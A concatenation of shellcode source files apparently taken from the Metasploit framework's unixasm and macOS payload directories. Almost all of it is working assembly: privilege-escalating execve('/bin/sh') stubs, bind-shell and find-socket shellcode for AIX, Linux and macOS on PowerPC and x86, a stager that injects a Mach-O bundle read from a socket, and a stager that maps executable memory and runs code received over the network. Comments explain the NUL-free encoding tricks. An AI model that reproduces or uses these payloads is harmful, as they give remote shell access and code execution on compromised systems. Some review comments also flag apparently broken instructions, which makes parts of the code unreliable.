# Build an 8-byte syscall stub on the stack, NUL-free: the pushed words
# are NOTed in place to become
#   9a 00 00 00 00 07 00   lcall $0x7,$0   (SCO syscall call gate)
#   c3                     ret
pushl $0x3cfff8ff
pushl $0x65
movl %esp,%esi                          # esi = &stub
notl 0x04(%esi)                         # ff f8 ff 3c -> 00 07 00 c3
notb (%esi)                             # 0x65 -> 0x9a (lcall opcode)
setuidcode:
# setuid(0)
xorl %eax,%eax
pushl %eax                              # uid = 0
movb $0x17,%al                          # 23 = SYS_setuid
call *%esi                              # call pushes the return-addr "spacer"
shellcode:
# execve("/bin//sh", NULL, NULL)
xorl %eax,%eax
pushl %eax                              # string terminator
pushl $0x68732f2f                       # "//sh"
pushl $0x6e69622f                       # "/bin"
movl %esp,%ebx                          # ebx = path
pushl %eax                              # envp = NULL
pushl %eax                              # argv = NULL
pushl %ebx                              # path
movb $0x3b,%al                          # 59 = SYS_execve
call *%esi
|
OpenWireSec/metasploit | 3,042 | external/source/unixasm/aix-power-bndsockcode.S | /*
* aix-power-bndsockcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Supported AIX versions:
*
* -DAIX614 AIX Version 6.1.4
* -DAIX613 AIX Version 6.1.3
* -DAIX612 AIX Version 6.1.2
* -DAIX611 AIX Version 6.1.1
* -DAIX5310 AIX Version 5.3.10
* -DAIX539 AIX Version 5.3.9
* -DAIX538 AIX Version 5.3.8
* -DAIX537 AIX Version 5.3.7
*
*/
#include "aix-power.h"
.globl .main
.csect .text[PR]
.main:
# AIX/PowerPC bind-shell on port 1234.  AIX syscalls take the syscall
# number in r2 and return to LR, so the code builds a reusable stub
# (crorc; sc) and keeps its address in r30; every syscall is then
# "mtctr r30; bctrl" (bctrl sets LR for the kernel's return).
syscallcode:
# GetPC: bnel is never taken (CR0.EQ set) but still writes LR, so
# LR = address of the mflr below (syscallcode+8).
xor. %r31,%r31,%r31
bnel syscallcode
mflr %r30
cal %r30,511(%r30)                      # +511/-511 keeps displacements NUL-free
cal %r30,-511+28(%r30)                  # r30 = LR+28 = the "cal %r30,-8" below
mtctr %r30
bctr                                    # jump over the stub...
crorc %cr6,%cr6,%cr6                    # syscall stub: cr6 hint required by the
.long 0x44ffff02                        # AIX ABI, then NUL-free "sc"
cal %r30,-8(%r30)                       # ...land here: r30 = &stub; fall through
bndsockcode:
lil %r29,__CAL
# socket(AF_INET, SOCK_STREAM, 0)
xor %r5,%r5,%r5                         # protocol = 0
cal %r4,-__CAL+1(%r29)                  # type = SOCK_STREAM
cal %r3,-__CAL+2(%r29)                  # domain = AF_INET
cal %r2,__NC_socket(%r29)               # AIX: syscall number in r2
mtctr %r30
bctrl
mr %r28,%r3                             # r28 = listening socket fd
# bind(s, &sockaddr_in, 16)
cal %r5,-__CAL+16(%r29)                 # addrlen
liu %r27,0xff02                         # sin_family AF_INET (junk high byte,
oril %r27,%r27,0x04d2                   # NUL-free) + sin_port 1234
stu %r31,-4(%r1)                        # sin_addr = INADDR_ANY
stu %r27,-4(%r1)                        # family/port word
mr %r4,%r1                              # r4 = &sockaddr_in (r3 still = fd)
cal %r2,__NC_bind(%r29)
mtctr %r30
bctrl
# listen(s, 0)
xor %r4,%r4,%r4
mr %r3,%r28
cal %r2,__NC_listen(%r29)
mtctr %r30
bctrl
# accept(s, NULL, NULL)
xor %r5,%r5,%r5
xor %r4,%r4,%r4
mr %r3,%r28
cal %r2,__NC_accept(%r29)
mtctr %r30
bctrl
mr %r26,%r3                             # r26 = connected client fd
# close(n) + kfcntl(client, F_DUPFD, n) for n = 2,1,0:
# closing n first makes F_DUPFD hand back exactly fd n.
cal %r25,-__CAL+2(%r29)
0:
mr %r3,%r25
cal %r2,__NC_close(%r29)
mtctr %r30
bctrl
# kfcntl
mr %r5,%r25                             # arg = n
xor %r4,%r4,%r4                         # cmd = 0 = F_DUPFD
mr %r3,%r26                             # fd = client socket
cal %r2,__NC_kfcntl(%r29)
mtctr %r30
bctrl
ai. %r25,%r25,-1
bge 0b
shellcode:
# lil %r29,__CAL
# execve("/bin/csh", argv, NULL) -- fresh GetPC into r24 (r30 must be
# preserved: it still holds the syscall stub address).
xor. %r5,%r5,%r5
bnel shellcode
# mflr %r30
# cal %r30,511(%r30)
# cal %r3,-511+40(%r30)
# stb %r5,-511+48(%r30)
mflr %r24
cal %r24,511(%r24)
cal %r3,-511+40(%r24)                   # r3 = &"/bin/csh"
stb %r5,-511+48(%r24)                   # terminate the string
stu %r5,-4(%r1)                         # argv[1] = NULL
stu %r3,-4(%r1)                         # argv[0] = path
mr %r4,%r1                              # r4 = argv
cal %r2,__NC_execve(%r29)
# crorc %cr6,%cr6,%cr6
# .long 0x44ffff02
mtctr %r30
bctrl
.asciz "/bin/csh"
|
OpenWireSec/metasploit | 1,094 | external/source/unixasm/osx-ppc-shellcode.s | /*
* osx-ppc-shellcode.s
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
# 00 bytes
# OSX/PowerPC execve("/bin/sh") stub (syscall number in r0, trap via "sc").
# NOTE(review): several points look unfinished in this file --
#  - "lr r1,r4" moves r4 (uninitialized) into r1/sp; the intent is almost
#    certainly r4 = r1 (argv pointer for execve) -- confirm operand order.
#  - LR from the bnel points at the mflr (+8), so r3 = LR+32 lands 4 bytes
#    into the string, i.e. at "/sh" rather than "/bin/sh" -- verify offset.
#  - ".asciiz" is not a standard GAS/cctools directive (".asciz" is).
shellcode:
# GetPC: bnel never taken (CR0.EQ), but LK=1 still writes LR
xor. r5,r5,r5
bnel shellcode
mflr r31
addi r3,r31,32                          # r3 = path pointer (see offset note above)
stwu r5,-4(r1)                          # push argv[1] = NULL
stwu r3,-4(r1)                          # push argv[0] = path
lr r1,r4                                # intended: r4 = argv (see note above)
li r0,59                                # SYS_execve
sc
.asciiz "/bin/sh"
|
OpenWireSec/metasploit | 2,117 | external/source/unixasm/lin-power-fndsockcode64.S | /*
* lin-power-fndsockcode64.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include "linux-power.h"
.globl main
main:
# Linux/PowerPC64 "findsock" shellcode: scan fd numbers upward, calling
# getpeername() on each until one reports remote port 1234 (the attacker's
# connection), then dup2 that fd over stdio and exec a shell.  Socket ops
# go through sys_socketcall; ".long 0x44ffff02" is a NUL-free "sc".
fndsockcode64:
xor %r31,%r31,%r31                      # r31 = fd candidate, starts at 0
lil %r29,__CAL
# getpeername
stu %r31,-4(%r1)                        # sockaddr buffer (zeroed word)
mr %r28,%r1                             # r28 = &sockaddr
cal %r27,-511+16(%r29)                  # r27 = 16 = sizeof(sockaddr_in)
stu %r27,-4(%r1)
mr %r26,%r1                             # r26 = &addrlen
stdu %r26,-8(%r1)                       # args[2] = &addrlen
stdu %r28,-8(%r1)                       # args[1] = &sockaddr
stdu %r31,-8(%r1)                       # args[0] = fd (rewritten each pass)
0:
cal %r31,511(%r31)                      # r31 += 1 (NUL-free two-step add)
cal %r31,-511+1(%r31)
cal %r1,511(%r1)                        # pop the fd slot pushed last pass /
cal %r1,-511+8(%r1)                     # initial push (r1 += 8)
stdu %r31,-8(%r1)                       # args[0] = next candidate fd
mr %r4,%r1
cal %r3,__NC_getpeername(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
cal %r25,511(%r28)                      # load sockaddr.sin_port (offset 2,
lhz %r25,-511+2(%r25)                   # big-endian halfword)
cmpli 0,%r25,1234                       # is the peer's source port 1234?
bne 0b
cal %r24,-511+2(%r29)                   # r24 = 2 = first dup2 target
1:
# dup2(found_fd, n) for n = 2,1,0
mr %r4,%r24
mr %r3,%r31
cal %r0,__NC_dup2(%r29)
.long 0x44ffff02
ai. %r24,%r24,-1
bge 1b
shellcode64:
# lil %r31,__CAL
# execve("/bin/sh") -- GetPC via never-taken bnel (LK=1 writes LR anyway)
xor. %r5,%r5,%r5
bnel shellcode64
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+36(%r30)                   # r3 = &"/bin/sh"
stb %r5,-511+43(%r30)                   # terminate the string
stdu %r5,-8(%r1)                        # argv[1] = NULL (64-bit pushes)
stdu %r3,-8(%r1)                        # argv[0] = path
mr %r4,%r1
# cal %r0,__NC_execve(%r31)
cal %r0,__NC_execve(%r29)
.long 0x44ffff02
.asciz "/bin/sh"
|
OpenWireSec/metasploit | 2,632 | external/source/unixasm/lin-power-bndsockcode64.S | /*
* lin-power-bndsockcode64.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include "linux-power.h"
.globl main
main:
# Linux/PowerPC64 bind-shell on port 1234 -- 64-bit variant of
# lin-power-bndsockcode: socketcall argument arrays use 64-bit pushes
# (stdu), while the 16-byte sockaddr_in itself is built with 32-bit
# stores (stu).  ".long 0x44ffff02" is a NUL-free "sc".
bndsockcode64:
xor %r31,%r31,%r31                      # r31 = 0
lil %r29,__CAL
# socket(AF_INET, SOCK_STREAM, 0) via socketcall
cal %r28,-511+1(%r29)                   # r28 = 1 = SOCK_STREAM
cal %r27,-511+2(%r29)                   # r27 = 2 = AF_INET (later fd counter)
stdu %r31,-8(%r1)                       # args[2] = protocol = 0
stdu %r28,-8(%r1)                       # args[1] = SOCK_STREAM
stdu %r27,-8(%r1)                       # args[0] = AF_INET
mr %r4,%r1
cal %r3,__NC_socket(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
mr %r26,%r3                             # r26 = listening socket fd
# bind
cal %r25,-511+16(%r29)                  # r25 = 16 = sizeof(sockaddr_in)
/*
* The following GPRs result in zeros when used with liu instruction.
* %r24, %r16, %r8, %r0
*
*/
liu %r23,0xff02                         # sin_family AF_INET (junk high byte,
oril %r23,%r23,0x04d2                   # NUL-free) + sin_port 1234
stu %r31,-4(%r1)                        # sin_addr = INADDR_ANY (32-bit stores)
stu %r23,-4(%r1)
mr %r22,%r1                             # r22 = &sockaddr_in
stdu %r25,-8(%r1)                       # args[2] = addrlen
stdu %r22,-8(%r1)                       # args[1] = &sockaddr_in
stdu %r26,-8(%r1)                       # args[0] = fd
mr %r4,%r1
cal %r3,__NC_bind(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
# listen(fd, 0)
stdu %r31,-8(%r1)
stdu %r31,-8(%r1)
stdu %r26,-8(%r1)
mr %r4,%r1
cal %r3,__NC_listen(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
# accept -- reuses the (fd, 0, 0) argument array
mr %r4,%r1
cal %r3,__NC_accept(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
mr %r21,%r3                             # r21 = connected client fd
0:
# dup2(client, n) for n = 2,1,0
mr %r4,%r27
mr %r3,%r21
cal %r0,__NC_dup2(%r29)
.long 0x44ffff02
ai. %r27,%r27,-1
bge 0b
shellcode64:
# lil %r31,__CAL
# execve("/bin/sh") -- GetPC via never-taken bnel (LK=1 writes LR anyway)
xor. %r5,%r5,%r5
bnel shellcode64
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+36(%r30)                   # r3 = &"/bin/sh"
stb %r5,-511+43(%r30)                   # terminate the string
stdu %r5,-8(%r1)                        # argv[1] = NULL
stdu %r3,-8(%r1)                        # argv[0] = path
mr %r4,%r1
# cal %r0,__NC_execve(%r31)
cal %r0,__NC_execve(%r29)
.long 0x44ffff02
.asciz "/bin/sh"
|
OpenWireSec/metasploit | 2,779 | external/source/unixasm/aix-power-fndsockcode.S | /*
* aix-power-fndsockcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Supported AIX versions:
*
* -DAIX614 AIX Version 6.1.4
* -DAIX613 AIX Version 6.1.3
* -DAIX612 AIX Version 6.1.2
* -DAIX611 AIX Version 6.1.1
* -DAIX5310 AIX Version 5.3.10
* -DAIX539 AIX Version 5.3.9
* -DAIX538 AIX Version 5.3.8
* -DAIX537 AIX Version 5.3.7
*
*/
#include "aix-power.h"
.globl .main
.csect .text[PR]
.main:
# AIX/PowerPC "findsock": scan fds upward with getpeername() until the peer
# port is 1234, then duplicate that fd over stdio and exec /bin/csh.
# AIX syscalls: number in r2, kernel returns to LR -- hence the shared
# (crorc; sc) stub whose address lives in r30, invoked via mtctr/bctrl.
syscallcode:
# GetPC: bnel never taken (CR0.EQ) but LK=1 still writes LR = &mflr
xor. %r31,%r31,%r31
bnel syscallcode
mflr %r30
cal %r30,511(%r30)                      # NUL-free displacement arithmetic
cal %r30,-511+28(%r30)                  # r30 = the "cal %r30,-8" below
mtctr %r30
bctr                                    # hop over the stub...
crorc %cr6,%cr6,%cr6                    # syscall stub: cr6 hint + NUL-free "sc"
.long 0x44ffff02
cal %r30,-8(%r30)                       # ...r30 = &stub; fall into fndsockcode
fndsockcode:
lil %r29,__CAL
# getpeername(fd, &sockaddr, &addrlen) over increasing fd
stu %r31,-4(%r1)                        # sockaddr buffer (zero word)
mr %r28,%r1                             # r28 = &sockaddr
cal %r27,-__CAL+44(%r29)                # addrlen = 44
stu %r27,-4(%r1)
mr %r27,%r1                             # r27 = &addrlen
0:
cal %r31,511(%r31)                      # fd candidate += 1 (NUL-free add)
cal %r31,-511+1(%r31)
mr %r5,%r27                             # &addrlen
mr %r4,%r28                             # &sockaddr
mr %r3,%r31                             # fd
cal %r2,__NC_getpeername(%r29)
mtctr %r30
bctrl
cal %r26,511(%r28)                      # read sin_port (offset 2, big-endian)
lhz %r26,-511+2(%r26)
cmpli 0,%r26,1234                       # peer source port == 1234?
bne 0b
# close(n) + kfcntl(found, F_DUPFD, n) for n = 2,1,0
cal %r25,-__CAL+2(%r29)
1:
mr %r3,%r25
cal %r2,__NC_close(%r29)
mtctr %r30
bctrl
# kfcntl
mr %r5,%r25                             # arg = n
xor %r4,%r4,%r4                         # cmd = 0 = F_DUPFD
mr %r3,%r31                             # fd = found socket
cal %r2,__NC_kfcntl(%r29)
mtctr %r30
bctrl
ai. %r25,%r25,-1
bge 1b
shellcode:
# lil %r29,__CAL
# execve("/bin/csh") -- GetPC into r24 (r30 still holds the syscall stub)
xor. %r5,%r5,%r5
bnel shellcode
# mflr %r30
# cal %r30,511(%r30)
# cal %r3,-511+40(%r30)
# stb %r5,-511+48(%r30)
mflr %r24
cal %r24,511(%r24)
cal %r3,-511+40(%r24)                   # r3 = &"/bin/csh"
stb %r5,-511+48(%r24)                   # terminate the string
stu %r5,-4(%r1)                         # argv[1] = NULL
stu %r3,-4(%r1)                         # argv[0] = path
mr %r4,%r1                              # r4 = argv
cal %r2,__NC_execve(%r29)
# crorc %cr6,%cr6,%cr6
# .long 0x44ffff02
mtctr %r30
bctrl
.asciz "/bin/csh"
|
OpenWireSec/metasploit | 1,611 | external/source/unixasm/osx-x86-fndsockcode.s | /*
* osx-x86-fndsockcode.s
* Copyright 2006 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
# 61 bytes
# OSX/x86 "findsock": walk fd numbers upward calling getpeername() until
# the peer's port is 1234, then dup2 it over stdio and exec a shell.
# BSD int $0x80 ABI (stack args + spacer word).
fndsockcode:
xorl %eax,%eax
pushl %eax                              # sockaddr buffer on the stack
movl %esp,%edi                          # edi = &sockaddr
pushl $0x10                             # addrlen = 16
pushl %esp                              # &addrlen
pushl %edi                              # &sockaddr
pushl %eax                              # fd = 0 (incremented below)
pushl %eax                              # spacer
0:
popl %eax                               # discard old spacer
popl %eax                               # eax = previous fd candidate
incl %eax                               # next fd
pushl %eax                              # fd
pushl %eax                              # spacer
pushl $0x1f
popl %eax                               # eax = 31 = SYS_getpeername (NUL-free)
int $0x80
cmpw $0xd204,0x02(%edi)                 # sin_port (big-endian 1234) at offset 2
jne 0b
pushl %eax                              # counter slot for the dup2 loop
1:
# dup2(found_fd, n), n counting down to 0
pushl $0x5a
popl %eax                               # eax = 90 = SYS_dup2
int $0x80
decl -0x10(%edi)                        # decrement the target-fd slot
jns 1b
shellcode:
# xorl %eax,%eax
# pushl %eax
# execve("/bin//sh", argv, envp); string terminator is already on the stack
pushl $0x68732f2f                       # "//sh"
pushl $0x6e69622f                       # "/bin"
movl %esp,%ebx                          # ebx = path
pushl %eax                              # NULL terminator
pushl %esp
pushl %esp
pushl %ebx                              # path
pushl %eax                              # spacer
movb $0x3b,%al                          # 59 = SYS_execve
int $0x80
|
OpenWireSec/metasploit | 6,685 | external/source/osx/x86/include/_inject_bundle.s | ;;;
;;;
;;; Skip straight to inject_bundle when we assemble this as bin file
;;;
jmp _inject_bundle
;;; --------------------------------------------------------------------
;;; Constants
;;; --------------------------------------------------------------------
;;; mmap flags/protections and NSLinkModule options (values match the
;;; 32-bit macOS headers of the era this was written for).
%define MAP_ANON 0x1000
%define MAP_PRIVATE 0x0002
%define PROT_READ 0x01
%define PROT_WRITE 0x02
%define NSLINKMODULE_OPTION_BINDNOW 0x1
%define NSLINKMODULE_OPTION_PRIVATE 0x2
%define NSLINKMODULE_OPTION_RETURN_ON_ERROR 0x4
;;; --------------------------------------------------------------------
;;; ror13_hash(string symbol_name)
;;;
;;; Compute the 32-bit "ror13" hash for a given symbol name. The hash
;;; value is left in the variable hash
;;; --------------------------------------------------------------------
;;; Assembly-time only (NASM preprocessor): hash = ror13(hash) + c for
;;; each character, mirroring the runtime loop in _macho_resolve.
%macro ror13_hash 1
%assign hash 0
%assign c 0
%strlen len %1
%assign i 1
%rep len
%substr c %1 i
%assign hash ((((hash >> 13) | (hash << 19)) + c) & 0xFFFFFFFF)
%assign i i + 1
%endrep
%endmacro
;;; --------------------------------------------------------------------
;;; dyld_resolve(uint32_t hash)
;;;
;;; Lookup the address of an exported symbol within dyld by "ror13" hash.
;;;
;;; Arguments:
;;; hash - 32-bit "ror13" hash of symbol name
;;; --------------------------------------------------------------------
_dyld_resolve:
mov eax, [esp+4] ; eax = hash argument
push eax
push 0x8fe00000 ; historical fixed load address of dyld on 32-bit macOS
call _macho_resolve
ret 4 ; callee pops its single argument
;;; --------------------------------------------------------------------
;;; macho_resolve(void* base, uint32_t hash)
;;;
;;; Lookup the address of an exported symbol within the given Mach-O
;;; image by "ror13" hash value.
;;;
;;; Arguments:
;;; base - base address of Mach-O image
;;; hash - 32-bit "ror13" hash of symbol name
;;; --------------------------------------------------------------------
_macho_resolve:
;; Walk the image's load commands: remember __TEXT's preferred address
;; (to compute the slide) and __LINKEDIT's file-offset base, then scan
;; LC_SYMTAB's nlist entries, ror13-hashing each symbol name until it
;; matches the requested hash.  Returns the slid symbol address in eax,
;; or falls through with eax unchanged if nothing matches.
;; Locals: [ebp-4] = remaining ncmds, [ebp-8] = preferred load address,
;; [ebp-12] = linkedit base for symoff/stroff translation.
push ebp
mov ebp, esp
sub esp, byte 12
push ebx
push esi
push edi
mov ebx, [ebp+8] ; mach-o image base address
mov eax, [ebx+16] ; mach_header->ncmds
mov [ebp-4], eax ; ncmds
add bl, 28 ; Advance ebx to first load command
.loadcmd:
;; Load command loop
xor eax, eax
cmp dword [ebp-4], eax
je .return
inc eax
cmp [ebx], eax ; cmd == LC_SEGMENT (1)?
je .segment
inc eax
cmp [ebx], eax ; cmd == LC_SYMTAB (2)?
je .symtab
.next_loadcmd:
;; Advance to the next load command
dec dword [ebp-4]
add ebx, [ebx+4] ; ebx += cmd->cmdsize
jmp .loadcmd
.segment:
;; Look for "__TEXT" segment
cmp [ebx+10], dword 'TEXT'
je .text
;; Look for "__LINKEDIT" segment
cmp [ebx+10], dword 'LINK'
je .linkedit
jmp .next_loadcmd
.text:
mov eax, [ebx+24]
mov [ebp-8], eax ; save image preferred load address
jmp .next_loadcmd
.linkedit:
;; We have found the __LINKEDIT segment
mov eax, [ebx+24] ; segcmd->vmaddr
sub eax, [ebp-8] ; image preferred load address
add eax, [ebp+8] ; actual image load address
sub eax, [ebx+32] ; segcmd->fileoff
mov [ebp-12], eax ; save linkedit segment base
jmp .next_loadcmd
.symtab:
;; Examine LC_SYMTAB load command, iterating symbols high-to-low
mov ecx, [ebx+12] ; ecx = symtab->nsyms
.symbol:
xor eax, eax
cmp ecx, eax
je .return
dec ecx
imul edx, ecx, byte 12 ; edx = index into symbol table (sizeof(nlist)=12)
add edx, [ebx+8] ; edx += symtab->symoff
add edx, [ebp-12] ; adjust symoff relative to linkedit
mov esi, [edx] ; esi = index into string table
add esi, [ebx+16] ; esi += symtab->stroff
add esi, [ebp-12] ; adjust stroff relative to linkedit
;; hash = (hash >> 13) | ((hash & 0x1fff) << 19) + c
xor edi, edi
cld
.hash:
xor eax, eax
lodsb ; next character of the symbol name
cmp al, ah ; NUL terminator reached?
je .compare
ror edi, 13
add edi, eax
jmp .hash
.compare:
cmp edi, [ebp+12] ; does the hash match the one requested?
jne .symbol
mov eax, [edx+8] ; return symbols[ecx].n_value
sub eax, [ebp-8] ; adjust to actual load address
add eax, [ebp+8]
.return:
pop edi
pop esi
pop ebx
leave
ret 8 ; callee pops both arguments (base, hash)
;;; --------------------------------------------------------------------
;;; inject_bundle(int filedes)
;;;
;;; Read a Mach-O bundle from the given file descriptor, load and link
;;; it into the currently running process.
;;;
;;; Arguments:
;;; filedes (edi) - file descriptor to read() bundle from
;;; --------------------------------------------------------------------
_inject_bundle:
;; Protocol on the socket: a 4-byte little-endian length, then that many
;; bytes of Mach-O bundle.  The bundle is mmap'd, loaded via
;; NSCreateObjectFileImageFromMemory/NSLinkModule (resolved from dyld by
;; ror13 hash), its exported "_run" symbol is located and called with the
;; socket fd, and finally the process exits.
;; Registers: esi = socket fd, edi = mmap buffer cursor.
;; Locals: [ebp-4] = bundle length, [ebp-8] = buffer / objectFileImage.
push ebp
mov ebp, esp
sub esp, byte 12
mov esi, edi ; arg0: filedes
.read_size:
;; Read a 4-byte size of bundle to read
xor eax, eax
mov al, 4
push eax ; nbyte
lea edi, [ebp-4]
push edi ; buf
push esi ; s
push eax ; spacer; dec turns eax into 3 = SYS_read
dec eax
int 0x80
jb .read_error
cmp eax, ecx ; A zero-read signals termination
; NOTE(review): ecx is not initialized on this path --
; relies on the caller/loader leaving it 0; confirm.
je .read_error
mov ecx, [ebp-4]
xor eax, eax
cmp ecx, eax
je .read_error ; A zero value signals termination
jmp .mmap
.read_error:
jmp .error
.mmap:
;; mmap memory: mmap(0, size, RW, MAP_ANON|MAP_PRIVATE, -1, 0)
xor eax, eax
push eax ; offset = 0
push -1 ; fd = -1 (required for MAP_ANON)
push (MAP_ANON | MAP_PRIVATE)
push (PROT_READ | PROT_WRITE)
push ecx ; size
push eax ; addr = 0
push eax ; spacer
mov al, 197 ; SYS_mmap
int 0x80
jb .error
mov edi, eax ; memory buffer
mov [ebp-8], edi
;; read bundle from file descriptor into mmap'd buffer
.read_bundle:
xor eax, eax
push ecx ; nbyte
push edi ; buf
push esi ; filedes
push eax ; spacer
mov al, 3 ; SYS_read
int 0x80
jb .error
add edi, eax ; advance cursor by bytes read
sub ecx, eax ; and reduce the remaining count
jnz .read_bundle
mov edi, [ebp-8] ; load original memory buffer
;; Now that we are calling library methods, we need to make sure
;; that esp is 16-byte aligned at the the point of the call
;; instruction. So we align the stack here and then just be
;; careful to keep it aligned as we call library functions.
sub esp, byte 16
and esp, 0xfffffff0
;; load bundle from mmap'd buffer
push byte 0 ; maintain alignment
lea eax, [ebp-8]
push eax ; &objectFileImage
push dword [ebp+12] ; size
push edi ; addr
ror13_hash "_NSCreateObjectFileImageFromMemory"
push dword hash ; assembly-time hash constant (see macro)
call _dyld_resolve
call eax
cmp al, 1 ; NSObjectFileImageSuccess == 1
jne .error
;; link bundle from object file image
xor eax, eax
push eax
mov al, (NSLINKMODULE_OPTION_RETURN_ON_ERROR | NSLINKMODULE_OPTION_BINDNOW)
push eax
push esp ; "" (empty module name on the stack)
push dword [ebp-8]
ror13_hash "_NSLinkModule"
push dword hash
call _dyld_resolve
call eax
;; run_symbol = NSLookupSymbolInModule(module, "_run")
mov ebx, eax
xor eax, eax
push eax ; "\0\0\0\0"
push 0x6e75725f ; "_run"
mov eax, esp
push eax ; sym
push ebx ; module
ror13_hash "_NSLookupSymbolInModule"
push dword hash
call _dyld_resolve
call eax
;; NSAddressOfSymbol(run_symbol)
sub esp, 12 ; maintain alignment
push eax
ror13_hash "_NSAddressOfSymbol"
push dword hash
call _dyld_resolve
call eax
;; _run(socket)
sub esp, 12 ; maintain alignment
push esi
call eax
.error:
;; Exit cleanly
xor eax, eax
push eax ; EXIT_SUCCESS
push eax ; spacer
mov al, 1 ; SYS_exit
int 0x80
|
OpenWireSec/metasploit | 1,077 | external/source/osx/x86/include/_read_exec.s | _read_exec:
;; Save some stack space
;; _read_exec body: repeatedly read a 4-byte fragment length from the
;; socket in edi, mmap an RWX buffer of that size, read the fragment into
;; it back-to-front bookkeeping via esi/ebx, and jump to it.
;; NOTE(review): the "end" label jumped to on errors is defined outside
;; this chunk -- confirm it exists in the including file.
mov ebp, esp
sub esp, byte 8
.loop:
xor ecx, ecx ; clear ecx
mul ecx ; clear eax and edx (edx:eax = eax*ecx = 0)
;; Read a 4-byte size of code fragment to execute
push ecx
mov esi, esp
mov al, 4
push eax ; nbyte
push esi ; buf
push edi ; s
push eax ; spacer; dec makes eax = 3 = SYS_read
dec eax
int 0x80
jb end
mov esi, [esp+16] ; code buffer length
;; mmap memory: mmap(0, len, RWX, MAP_ANON|MAP_PRIVATE, -1, 0)
xor eax, eax
push eax ; alignment spacer
push eax ; 0
dec eax
push eax ; -1
inc eax
mov ax, 0x1002
push eax ; (MAP_ANON | MAP_PRIVATE)
xor eax, eax
mov al, 7
push eax ; (PROT_READ | PROT_WRITE | PROT_EXEC)
push esi ; len
push edx ; addr
push edx ; spacer
mov al, 197 ; SYS_mmap
int 0x80
jb end
;; read fragment from file descriptor into mmap buffer
mov ebx, eax
add ebx, esi ; ebx = one past the end of the buffer
.read_fragment:
push esi ; nbytes
mov eax, ebx
sub eax, esi
push eax ; buf = end - remaining
push edi ; s
push edx ; spacer
xor eax, eax
mov al, 3 ; SYS_read
int 0x80 ; read(edi, eax, esi)
jb end
sub ebx, eax ; Subtract bytes read to buf end pointer
sub esi, eax ; Subtract bytes read from total
jnz .read_fragment
;; when done, ebx has walked back to the buffer start: execute it
jmp ebx
|
OpenWireSec/metasploit | 1,090 | external/source/osx/x86/include/_shell.s | _shell:
;; Test if vfork() will be needed. If execve(0, 0, 0) fails with
;; ENOTSUP, then we are in a threaded process and need to call
;; vfork().
xor eax, eax
push eax ; envp
push eax ; argv
push eax ; path
push eax ; spacer
mov al, 59 ; SYS_execve
int 0x80 ; deliberately-invalid probe call
nop
